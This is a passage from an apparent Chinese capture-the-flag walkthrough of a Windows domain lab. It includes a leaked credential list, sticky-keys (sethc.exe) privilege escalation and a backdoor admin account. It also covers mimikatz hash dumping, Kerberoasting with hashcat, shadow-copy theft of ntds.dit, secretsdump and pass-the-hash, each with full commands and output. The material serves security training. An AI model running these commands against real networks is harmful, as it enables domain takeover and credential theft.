XR-0979 | liujun | DEwYySf6Ni
XR-0980 | wangyong | h9XMZiEv0g
XR-0981 | huangyong | DgoIyPSTHZ
XR-0982 | lixiang | TAoPcpiF3g
XR-0983 | zhoujie | YrlB2gMuxF
XR-0984 | liuchao | ijaDY4Ilr3
XR-0985 | liuna | 6xn2jo17SE
XR-0986 | wangjing | 65MhGVI0oL
XR-0987 | liuling | MjmN9ahSLR
XR-0988 | chenjing | ha23yfqcPg
XR-0989 | wangqin | MsdW85gzFL
XR-0990 | wanglong | O3oD1lscAK
XR-0991 | chenlei | 3vtAJqzrYB
XR-0992 | yangjie | fuTBeq6z51
XR-0993 | zhangjun | l02GAEUHq9
XR-0994 | yangming | N3bYUqfenc
XR-0995 | zhangmei | S7DG5bgXtN
XR-0996 | wangrong | 2BPmaxilGq
XR-0997 | zhangpeng | BHOqDmCXMn
XR-0998 | liuyun | CB7sxbk84I
XR-0999 | wangkun | KuJH519OWg
XR-01000 | chenmin | e4gQGHorq3
XR-01001 | liqin | 4zEJkYPIpq
XR-01002 | wangfang | FTVYd4W02u
XR-01003 | liuhua | P9ndfu8wGh
XR-01004 | zhangqin | 0f1JTN5Qqp
XR-01005 | zhanglong | nH8mDpRbcN
XR-01006 | zhangjie | cTVwM25y3h
XR-01007 | liliang | Rf6zXV0YEI
XR-01008 | liyun | 3hxTmEoMBl
XR-01009 | wangcheng | Boy4Ezp987
XR-01010 | yangjing | gjhbXHcLW0
XR-01011 | chenying | koGFcPeBmi
XR-01012 | lihua | nSOjeYV3Nr
XR-01013 | liumei | yxAm2nWNp9
XR-01014 | yangjuan | Gpe6Au2hxF
XR-01015 | lidan | ogDLzMhCVP
XR-01016 | liyang | nDWvGhNMoe
XR-01017 | zhaojun | XtfZYOxeDJ

得到大量用户名和密码，注意到XR-0923机器我们扫出来过
XR-0923 | zhangshuai | wSbEajHzZs
可以rdp也可以winrm
evil-winrm连上，查看权限存在SeRestorePrivilege权限（rdp需要管理员权限才能看
奇安信攻防社区-手把手教你Windows提权

*Evil-WinRM* PS C:\Users\zhangshuai\Documents> whoami /all
[proxychains] Strict chain  ...  127.0.0.1:12345  ...  172.22.14.46:5985  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:12345  ...  172.22.14.46:5985  ...  OK

用户信息
----------------

用户名             SID
================== =============================================
xr-0923\zhangshuai S-1-5-21-754105099-1176710061-2177073800-1001


组信息
-----------------

组名                                 类型   SID          属性
==================================== ====== ============ ==============================
Everyone                             已知组 S-1-1-0      必需的组, 启用于默认, 启用的组
BUILTIN\Remote Desktop Users         别名   S-1-5-32-555 必需的组, 启用于默认, 启用的组
BUILTIN\Remote Management Users      别名   S-1-5-32-580 必需的组, 启用于默认, 启用的组
BUILTIN\Users                        别名   S-1-5-32-545 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NETWORK                 已知组 S-1-5-2      必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users     已知组 S-1-5-11     必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization       已知组 S-1-5-15     必需的组, 启用于默认, 启用的组
NT AUTHORITY\本地帐户                已知组 S-1-5-113    必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication     已知组 S-1-5-64-10  必需的组, 启用于默认, 启用的组
Mandatory Label\High Mandatory Level 标签   S-1-16-12288


特权信息
----------------------

特权名                        描述           状态
============================= ============== ======
SeRestorePrivilege            还原文件和目录 已启用
SeChangeNotifyPrivilege       绕过遍历检查   已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用


用户声明信息
-----------------------

用户声明未知。

已在此设备上禁用对动态访问控制的 Kerberos 支持。

渗透技巧——Windows九种权限的利用
SeRestorePrivilege这个权限用来实现恢复操作，对当前系统任意文件具有写权限
所以我们尝试劫持 sthc.exe

sethc.exe 是 Windows 操作系统中的一个系统文件，主要负责启用 “粘滞键” (Sticky Keys) 功能

ren sethc.exe sethc.old
ren cmd.exe sethc.exe
右键用户锁定，五次shift触发粘滞键，成功提权，读flag03

创建个新用户并加入管理员组
net user xianxin pass@123 /add
net localgroup Administrators xianxin /add
上传mimikatz以管理员权限运行导出哈希

1 2	privilege::debug sekurlsa::logonpasswords

重点为XR-0923$的hash


Authentication Id : 0 ; 33852 (00000000:0000843c)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/10/2 14:07:46
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 9774c7cd86ad7f4db2e24c0c724488cc
         * SHA1     : 9f7c11b43a028c2362ff63532ca70408fc9446f5
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : cc 3b b4 19 ce 3f c3 1f ba 5c 18 39 86 bf ed 4b e3 11 6a 34 ef 28 0a 8e ff 8a 1f 76 fd 75 1b bd a2 98 55 fc b5 02 c8 f3 5b 2c ac f3 25 53 23 e1 92 5e a9 a8 f3 63 83 e4 6f c5 05 a9 c5 f2 ef de 1c dd 39 76 4c ef 40 b8 55 59 56 0f ca c1 ae 90 f9 50 9f 49 21 ce b0 86 da b9 b8 61 ba 82 1b 97 ac 72 b4 40 1e 2d c3 bc cf b7 29 ac a0 bd 0d 0e 7a ab ac e3 d4 2c d4 53 54 a9 c0 c3 f2 ab 50 2e b2 34 04 9a 29 50 8a ca 37 1b d7 8b 77 e5 90 dc bb 12 13 02 2a b2 c2 2a ab 7f b6 33 3e 51 78 b5 fb 5e 69 6b 5d fe 46 44 f9 a6 9f 1a ac be e1 64 4e 6c eb c8 37 a8 b9 3d 5e c9 81 69 86 f0 c1 2f 44 f2 18 2e d7 fc 82 f6 e2 b1 1a ff 26 8b 55 f4 b8 6a 77 48 a2 ab 0f 4a 90 4e 91 34 8f 22 97 49 74 e3 c4 32 4d 32 32 a8 dc 1b e7 b1 6e 1a 34 36
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33818 (00000000:0000841a)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/10/2 14:07:46
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 9774c7cd86ad7f4db2e24c0c724488cc
         * SHA1     : 9f7c11b43a028c2362ff63532ca70408fc9446f5
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : cc 3b b4 19 ce 3f c3 1f ba 5c 18 39 86 bf ed 4b e3 11 6a 34 ef 28 0a 8e ff 8a 1f 76 fd 75 1b bd a2 98 55 fc b5 02 c8 f3 5b 2c ac f3 25 53 23 e1 92 5e a9 a8 f3 63 83 e4 6f c5 05 a9 c5 f2 ef de 1c dd 39 76 4c ef 40 b8 55 59 56 0f ca c1 ae 90 f9 50 9f 49 21 ce b0 86 da b9 b8 61 ba 82 1b 97 ac 72 b4 40 1e 2d c3 bc cf b7 29 ac a0 bd 0d 0e 7a ab ac e3 d4 2c d4 53 54 a9 c0 c3 f2 ab 50 2e b2 34 04 9a 29 50 8a ca 37 1b d7 8b 77 e5 90 dc bb 12 13 02 2a b2 c2 2a ab 7f b6 33 3e 51 78 b5 fb 5e 69 6b 5d fe 46 44 f9 a6 9f 1a ac be e1 64 4e 6c eb c8 37 a8 b9 3d 5e c9 81 69 86 f0 c1 2f 44 f2 18 2e d7 fc 82 f6 e2 b1 1a ff 26 8b 55 f4 b8 6a 77 48 a2 ab 0f 4a 90 4e 91 34 8f 22 97 49 74 e3 c4 32 4d 32 32 a8 dc 1b e7 b1 6e 1a 34 36
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/10/2 14:07:46
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :
        cloudap :

利用机器账户的 hash 去 GetUserSPN，发现 tianjing 用户
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :9774c7cd86ad7f4db2e24c0c724488cc -dc-ip 172.22.14.11

ServicePrincipalName           Name      MemberOf                                                  PasswordLastSet             LastLogon  Delegation 
-----------------------------  --------  --------------------------------------------------------  --------------------------  ---------  ----------
TERMSERV/xr-0923.xiaorang.lab  tianjing  CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab  2023-05-30 06:25:11.564883  <never>               
WWW/xr-0923.xiaorang.lab/IIS   tianjing  CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab  2023-05-30 06:25:11.564883  <never>

获取其 hash
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :9774c7cd86ad7f4db2e24c0c724488cc -dc-ip 172.22.14.11 -request-user tianjing
$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$c95304e39dd7c1f68379918a00249740$8cfa91606749402dd31d881eceb6890f2a6302b35f5fc3f5c5604cb031e2fe6b107383896c82df9ccd9e10adc2dda49878f1fc3e27fdbbc1166db49ba7181742fa223f74c66aa497c17b004b5c8f876f0d0b5c7a8fa4024570cf7b61d79527793a514ea35f28c7b9f81205c93de855bd92243ef0113c7fb3902a11ef879249cd66d801dcfb1f938b8fb94629cd09a2bfb71a38d8d0349304552d4fe036b245c88e37bc00ed4d5029eced442de2e409fca19c87f3ab81431e1f6e41ef55f3272db389fe3621ef495b922e1c3f9449788326b65b2c10f0ac69bdfa81c1cc81532fb47e1ada00277b61dd1dc6c7fbb026e6d383e4f56248c4cac0a8bd962a9aa2f0af4121d282d9362ebb59265549df91f00dc9dda546c2bf8f6baef63db335294caac03841cc9bf3796ea1f34bae186faab7e7b6e01ccf93969a5b1773103284d699e53f2ae1036d4370c1633fd7048b16b0114de67dbbc27a1494f35e705baf247e8a47a9a2513cb8d01d0d2cc4302d23c74a869ee8d0f26854fc5e0c47e26b53aa734b722857c72f27811e270a06dd75927cc630d7a48aab9c66cfa22b93c0dd4c986791cec4b76fe5de3eec6999dc5e489a8d13ceb5cedff0be8b9811da704b38408af3d802cac4c18be87325a8c5200525dba510f2483a6c2fe6d5ef600be2e21b173960f34e68fee3581885ed560c042f42a77d9d3f113e1f4c7d075541efaeeb5eff837cc848ede36b8114f48ced2d0104d155150d97874301d05665339fbc3877ed97f70d7ead35ee75bcf72f676877951163cb40d7f075ba1e18e9c58fb6009fdbe5b8015d6d79a6411797ba567a7bdf34b9f85361735400cb237a7b421cdb76a69945b649a64b04974e86fc0a8d9f81c29117e84a165237777811f55b88c90530eac97d31135db14b0c6f122caa2cf05b52dd11ccf1a1e3dfb40408a35123f8b735751994513c7bf60dd69b064f7d7b93b1cf69a417467b6478f8b2ebd4a18057fc33f812562c9364f71c07fb6d961018b80437c814d60a1233e94c25b027bbcd5ff052634afee49fdd12b9d0f64184e4e518f60bf7ba75676e12a54c6c168f29d312078082ad88f48b5b8d80e69e58b92d38560efa89fed677b2099c3d465fc3d72508328a649cd792236fbaac98df9db90d3772c1730e97fff8255413c01695b417aedfe9ad3d1d5d8ae93b2f6e69d90a287a8e7d065e756a4cd3d3a7bb71fcbb952fccc3fc75a38a66d77eb5c7251f450a7e0de62913c9fc16aad34fd67987b375129a032421b144a6b95bbe7ce13e0799492015a50436d7194e6ca3f2c114749db99a1e415e191477b7ee864ea4e6a494c47846568b4fde3bdc20a6c8490d5dcf2d35128a27f5590b1dc06bdc96aca4a0ba0197433a09c41ab2597b2445a5b7a688f90b7613a9d9bec5ba86914207da45e498a214292fde0ca2652d8eda856f0f377fe5a831c596e50d8af3aafa4cda
hashcat解密
hashcat -a 0 -m 13100 --force hash.txt /usr/share/wordlists/rockyou.txt

爆出来tianjing密码是DPQSXSXgh2
evil-winrm连接简单信息搜集
proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2

┌──(root㉿kali)-[/home/kali/Desktop]
└─# proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Strict chain  ...  127.0.0.1:12345  ...  172.22.14.11:5985  ...  OK
*Evil-WinRM* PS C:\Users\tianjing\Documents> whoami /all

用户信息
----------------

用户名            SID
================= =============================================
xiaorang\tianjing S-1-5-21-158000642-3359129478-2926607586-1104


组信息
-----------------

组名                                       类型   SID          属性
========================================== ====== ============ ==============================
Everyone                                   已知组 S-1-1-0      必需的组, 启用于默认, 启用的组
BUILTIN\Backup Operators                   别名   S-1-5-32-551 必需的组, 启用于默认, 启用的组
BUILTIN\Remote Management Users            别名   S-1-5-32-580 必需的组, 启用于默认, 启用的组
BUILTIN\Users                              别名   S-1-5-32-545 必需的组, 启用于默认, 启用的组
BUILTIN\Pre-Windows 2000 Compatible Access 别名   S-1-5-32-554 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NETWORK                       已知组 S-1-5-2      必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users           已知组 S-1-5-11     必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization             已知组 S-1-5-15     必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication           已知组 S-1-5-64-10  必需的组, 启用于默认, 启用的组
Mandatory Label\High Mandatory Level       标签   S-1-16-12288


特权信息
----------------------

特权名                        描述             状态
============================= ================ ======
SeMachineAccountPrivilege     将工作站添加到域 已启用
SeBackupPrivilege             备份文件和目录   已启用
SeRestorePrivilege            还原文件和目录   已启用
SeShutdownPrivilege           关闭系统         已启用
SeChangeNotifyPrivilege       绕过遍历检查     已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集   已启用


用户声明信息
-----------------------

用户声明未知。

已在此设备上禁用对动态访问控制的 Kerberos 支持。

谈谈域渗透中常见的可滥用权限及其应用场景（二）
利用卷影拷贝服务提取ntds.dit
卷影拷贝
有备份以及还原文件和目录的权限，尝试导出sam和system。
首先在本地创建一个dsh文件，这里命名为raj.dsh，内容如下

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

接下来再用unix2dos将dsh文件的编码间距转换为Windows兼容的编码和间距
unix2dos raj.dsh
接下来上传到靶机，我们在C:/下随便创个目录，上传此文件
卷影拷贝
diskshadow /s raj.dsh
复制到当前目录
RoboCopy /b z:\windows\ntds . ntds.dit
下载sam和system
download ntds.dit
reg save HKLM\SYSTEM system
download system
然后利用 impacket-secretsdump 成功获取域管 hash
impacket-secretsdump -ntds ntds.dit -system system local

横向即可
proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"
获取flag04

*Evil-WinRM* PS C:\Users\Administrator\flag> type flag04.txt
.______   .______       __  ____    ____  __   __       _______   _______  _______
|   _  \  |   _  \     |  | \   \  /   / |  | |  |     |   ____| /  _____||   ____|
|  |_)  | |  |_)  |    |  |  \   \/   /  |  | |  |     |  |__   |  |  __  |  |__
|   ___/  |      /     |  |   \      /   |  | |  |     |   __|  |  | |_ | |   __|
|  |      |  |\  \----.|  |    \    /    |  | |  `----.|  |____ |  |__| | |  |____
| _|      | _| `._____||__|     \__/     |__| |_______||_______| \______| |_______|

Good job!

flag04: flag{7c6537b4-af28-4cff-b56c-187b5308b6dc}

资料

手把手教你Windows提权